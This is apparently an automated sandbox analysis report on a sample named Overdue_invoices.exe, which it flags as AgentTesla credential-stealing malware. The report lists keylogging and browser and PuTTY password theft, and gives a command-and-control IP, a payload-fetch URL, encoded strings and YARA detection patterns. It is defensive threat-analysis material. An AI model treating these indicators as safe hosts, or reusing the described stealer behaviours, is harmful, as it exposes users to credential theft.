Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Overdue_invoices.exe

Overview

General Information

Sample Name:Overdue_invoices.exe
Analysis ID:344973
MD5:afa35ee8f27c8a6661219bccb198fd9b
SHA1:8b86a3066a24586bd5d17ce45ce8bd7984079af0
SHA256:2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
May check the online IP address of the machine
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Overdue_invoices.exe (PID: 5328 cmdline: 'C:\Users\user\Desktop\Overdue_invoices.exe' MD5: AFA35EE8F27C8A6661219BCCB198FD9B)
    • Overdue_invoices.exe (PID: 6020 cmdline: C:\Users\user\Desktop\Overdue_invoices.exe MD5: AFA35EE8F27C8A6661219BCCB198FD9B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x170:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x84:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xb01:$op3: 00 04 03 69 91 1B 40
  • 0x1360:$op3: 00 04 03 69 91 1B 40
00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0xff0:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x18810:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x30250:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xf04:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x18724:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x30164:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x1981:$op3: 00 04 03 69 91 1B 40
  • 0x21e0:$op3: 00 04 03 69 91 1B 40
  • 0x191a1:$op3: 00 04 03 69 91 1B 40
  • 0x19a00:$op3: 00 04 03 69 91 1B 40
  • 0x30be1:$op3: 00 04 03 69 91 1B 40
  • 0x31440:$op3: 00 04 03 69 91 1B 40
Process Memory Space: Overdue_invoices.exe PID: 6020JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.Overdue_invoices.exe.400000.0.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0x370:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0x284:$op2: 00 17 03 1F 20 17 19 15 28
    • 0xd01:$op3: 00 04 03 69 91 1B 40
    • 0x1560:$op3: 00 04 03 69 91 1B 40

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: Overdue_invoices.exe.6020.1.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Overdue_invoices.exeReversingLabs: Detection: 17%

    Compliance:

    barindex
    Uses 32bit PE filesShow sources
    Source: Overdue_invoices.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
    Source: Overdue_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

    Networking:

    barindex
    May check the online IP address of the machineShow sources
    Source: unknownDNS query: name: icanhazip.com
    Source: unknownDNS query: name: icanhazip.com
    Source: global trafficTCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
    Source: global trafficHTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 193.239.147.103 193.239.147.103
    Source: global trafficTCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
    Source: global trafficHTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
    Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
    Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103
    Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
    Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmpString found in binary or memory: http://bit.ly/icanhazip-faq
    Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
    Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmpString found in binary or memory: http://icanhazip.com
    Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmpString found in binary or memory: http://icanhazip.com/
    Source: Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmpString found in binary or memory: http://icanhazip.com4
    Source: Overdue_invoices.exe, 00000001.00000002.625776172.00000000018C6000.00000004.00000040.sdmpString found in binary or memory: http://ns.adobe.c/g
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
    Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmpString found in binary or memory: http://smtp.gmail.com
    Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/
    Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbt
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrom
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://i.imgur.com/9sS1RPE.png
    Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://mail.google.com
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
    Source: Overdue_invoices.exe, 00000001.00000002.626078559.00000000030F0000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontenP
    Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontenPf~
    Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com
    Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt
    Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
    Source: Overdue_invoices.exe, 00000001.00000002.626044350.00000000030E4000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627057496.000000000337F000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.626025797.00000000030D4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/mail/?p=WantAuthError
    Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/mail/answer/78754
    Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmpString found in binary or memory: https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
    Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/defaLMEM
    Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
    Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
    Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0binLMEM
    Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/Nn
    Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

    Key, Mouse, Clipboard, Microphone and Screen Capturing:

    barindex
    Contains functionality to log keystrokes (.Net Source)Show sources
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs.Net Code: SetHook
    Installs a global keyboard hookShow sources
    Source: C:\Users\user\Desktop\Overdue_invoices.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Overdue_invoices.exeJump to behavior

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
    Executable has a suspicious name (potential lure to open the executable)Show sources
    Source: Overdue_invoices.exeStatic file information: Suspicious name
    Initial sample is a PE file and has a suspicious nameShow sources
    Source: initial sampleStatic PE information: Filename: Overdue_invoices.exe
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 0_2_00AD73B00_2_00AD73B0
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 0_2_00AD6C380_2_00AD6C38
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 0_2_00AD57480_2_00AD5748
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 1_2_07EF8A381_2_07EF8A38
    Source: C:\Users\user\Desktop\Overdue_invoices.exeCode function: 1_2_07EF3EC01_2_07EF3EC0
    Source: Overdue_invoices.exeBinary or memory string: OriginalFilename vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000000.00000002.230410070.000000000290F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000000.00000002.230792815.00000000038E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000000.00000000.209905994.0000000000402000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000000.00000002.230130488.0000000000B5A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
    Source: Overdue_invoices.exeBinary or memory string: OriginalFilename vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.629484659.0000000005630000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000000.225837924.0000000000DB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.624689682.000000000041A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.625439956.000000000153A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.630778412.0000000006C30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Overdue_invoices.exe
    Source: Overdue_invoices.exe, 00000001.00000002.624879877.0000000001158000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue_invoices.exe
    Source: Overdue_invoices.exeBinary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
    Source: Overdue_invoices.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.csBase64 encoded string: 'MrE1thusbvL9jUnxf1Lcqml0/hEjxyBHvYQkHfU0e7ZA3dt4j2WOl2OHNkC7kY9pQCzpNPPRj8Y=', 'iMKrIqJC9ZAyLRDh/GZR6J5a0LtY5Iepg2LkeJHYP3LxSJU5ojpXjijfzghF2Psa', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'MXg5VX5jLbiBy9Cm6tjOR0HiHnsHY5fMkc3wHc95wy56a7HPbHGRobIWKceNtG8f', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'zSUT/U/UiMfSdmJXIlMFYstwqPXc90mjAAO6NC1KQy6trroQ+1O8lQ=='
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
